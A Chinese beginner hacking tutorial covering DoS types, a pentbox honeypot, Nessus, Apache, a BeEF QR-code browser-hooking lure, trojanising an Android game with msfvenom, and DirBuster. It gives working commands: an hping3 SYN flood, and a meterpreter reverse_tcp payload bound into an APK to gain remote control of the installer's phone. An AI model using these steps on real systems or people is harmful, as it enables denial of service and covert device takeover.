黑客玩具入門——8、其他攻擊手段

1、拒絕服務攻擊

使用某些手段故意佔用某一系統對外服務的有限資源,從而導致其無法正常工作的行爲就是拒絕服務攻擊。實際上拒絕服務攻擊並不是一個攻擊方式,它是一類具有相似特徵的攻擊方式的集合。拒絕服務攻擊有以下分類:

1. 數據鏈路層的拒絕服務攻擊

攻擊目標:交換機

集線器:以前的內網都是用集線器,集線器不具備學習記憶功能,多臺機器在通信的時候,都是將信息發給所有的機器,如果不是對應的機器接收到,就不做應答。它的缺點是,我們可以很簡單的獲取到整個網絡內的所有信息。

交換機:交換機有學習和記憶的功能,在交換機內部有一個CAM的表,這個表可以記錄交換機每個接口對應的計算機的MAC地址信息,有了這些信息,在傳輸數據的時候就可以一對一傳輸。

拒絕服務攻擊利用方法:CAM表容量有限,如果我們在短時間內製造大量的不同源的MAC地址發來的數據包,CAM表就會被佔滿,導致交換機無法正常工作。

2.網絡層的拒絕服務攻擊

TCP和UDP就位於這一層,而基於TCP的拒絕服務攻擊,就是大家常說的拒絕服務攻擊。大部分的服務器都是提供HTTP服務的服務器,HTTP協議就是TCP提供的支持。基於TCP的拒絕服務攻擊有兩種:

  1. 和目標端口完成三次握手,建立一個完整鏈接
  2. 只和目標端口完成三次握手的前兩次,建立一個不完整的鏈接,這種方式最常用。

利用工具:hping3。實驗靶機:Metasploitable2。

命令:hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source [目標ip]

3.傳輸層的拒絕服務攻擊

4.基於應用層的拒絕服務攻擊

5.DDOS攻擊

大家常說的DDOS攻擊,翻譯過來就是分佈式拒絕服務攻擊,也就是很多的機器同時對目標發起拒絕服務攻擊,這就是爲什麼DDOS往往和肉雞這個詞一起出現的原因。

2、用Kali Linux 蜜罐引誘可能的攻擊者進入陷阱

什麼是蜜罐?許多安全專家都喜歡的一個東西就是蜜罐。簡單地說,蜜罐是模擬特定網絡攻擊目標的系統。有了蜜罐,管理員可以檢測並記錄對某些服務發起的網絡攻擊,以及發起攻擊的IP地址。建立一個蜜罐是相當簡單的,使用Kali Linux和pentbox組合,可以在幾分鐘內啓動和運行一個蜜罐。

可以使用以下命令下載蜜罐:

wget http://downloads.sourceforge.net/project/pentbox18realised/pentbox-1.8.tar.gz

運行pentbox Ruby腳本:

./pentbox.rb

然後會看到一個菜單,在菜單中選擇2(用於網絡工具),然後選擇3(用於蜜罐)。

然後會讓你選擇快捷設置還是手動設置,如果快捷設置報錯了,那麼可以使用手動設置,比如端口被佔用等。

然後可以用另外一臺電腦來訪問該kali的ip地址,別忘了加端口號。

然後就沒有然後了。

3、Nessus

Nessus是目前全世界最多人使用的系統漏洞掃描和分析工具。

1、安裝

  1. 下載地址:https://www.tenable.com/downloads/nessus?loginAttempted=true。
  2. 下載kali linux的版本。注意要在kali的系統裏的瀏覽器裏下載哦。

  3. 然後,在你下載的那個文件夾裏右鍵打開終端:

  4. 然後輸入:sudo dpkg -i [安裝包名]。
  5. 開啓服務,命令已經告訴你了。sudo /bin/systemctl start nessusd.service

  6. 打開瀏覽器,訪問上圖中的鏈接地址。然後會出現個提示,就跟Windows訪問不安全的地址一樣,點灰色的按鈕,接受就好了。

  7. 點擊下一步,輸入郵箱和姓名(隨便寫好伐)。

  8. 然後回車,然後會發給你一封信,信裏有Activation Code,輸入Activation Code

  9. 然後會輸入用戶名和密碼。
  10. 然後就會更新軟件,就完事了,當然也可能會失敗。

2、使用方法

暫不介紹,自行百度。

4、Apache服務的使用方法

Apache是世界使用排名第一的web服務器軟件。它可以運行在幾乎所有廣泛使用的計算機平臺上,由於其跨平臺和安全性被廣泛使用,是最流行的Web服務器端軟件之一。

運行一個網站,可以作爲文件上傳下載的中轉站。其實咱們之前都玩過了。

啓動apache服務:sudo service apache2 start。

5、掃碼控制

實踐步驟:

  1. 修改虛擬機的聯網模式爲橋接模式
  2. 啓動beef框架,打開後設置一個你記得住的密碼。

  3. 複製網站模板(隨便百度靜態網站模板,就是靜態的html頁面)到kali中,把hook.js文件加入到模板的首頁中。

     把這段js腳本代碼,放到如下圖所示即可,注意,看到下面紅框裏的<IP>沒有?改成你的主機IP,就完事了。

  4. 把網站模板複製到Apache目錄下:
    • 先把apache目錄中原有的文件都刪除掉:sudo rm -rf *。
    • 然後把剛纔的index.html模板複製到該目錄下,之前學過這命令,不說了
  5. 啓動apache服務。也說過,再不知道回去看。
  6. 將網站首頁的鏈接製作成二維碼。通過草料二維碼,把鏈接地址轉換成二維碼就可以了。
  7. 登錄beef頁面,地址在這裏:

默認的用戶名就是beef,密碼就是剛纔你設置的:

就進來了。

  1. 用手機掃描二維碼。
  2. 然後你就可以在瀏覽器的beef標籤裏查看了。

所以!不要輕易掃碼!!!

6、在軟件中植入Payload

1.首先我下載了一個遊戲,你自己隨便下載。

2.在app中植入payload。啥意思不說了哈,都知道了。

 

sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.199.124 lport=6666 -x /home/zakingwong/game_old.apk R>/home/zakingwong/new.apk

3.然後開啓主控端,進入meterpreter。

4.通過apache把apl發送到你的安卓手機上。

5.安裝並打開遊戲。

6.然後,做之前學過的事吧!

7、DirBuster目錄爆破

要相對一個目標站點做滲透測試,首先要搞清楚的就是目標的目錄結構。這個任務可以交給DirBuster來做。DirBuster是一個多線程Java應用程序,可以破解Web應用程序服務器上的目錄和文件名。DirBuster自帶字典文件,當然我們可以根據收集到的其他信息,針對性的生成更加好用的字典文件。

使用方法,要想使用DirBuster只需要簡單的四部操作,實驗靶機是owasp linux服務器:

  1. 設置目標網站網址(在kali中搜索DirBuster就能找到了):

     

  2. 設置軟件掃碼的速度,也就是線程數。默認爲10,我們可以根據自己的需求設置,如果目標站點帶寬不夠且線程數太高,會導致目標站點無法正常訪問。拖拽修改即可。

  3. 設置字典文件。字典可以使我們根據已收集到的信息對應生成的字典。也可以是dirbuster默認自帶的幾個字典。dirbuster自帶的字典文件在/usr/share/dirbuster/wordlists/目錄下。

  4. 這些不用動,點start就可以了。

  5. 然後,我們可以在下圖的tabs中查看各種掃描結果信息

     

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章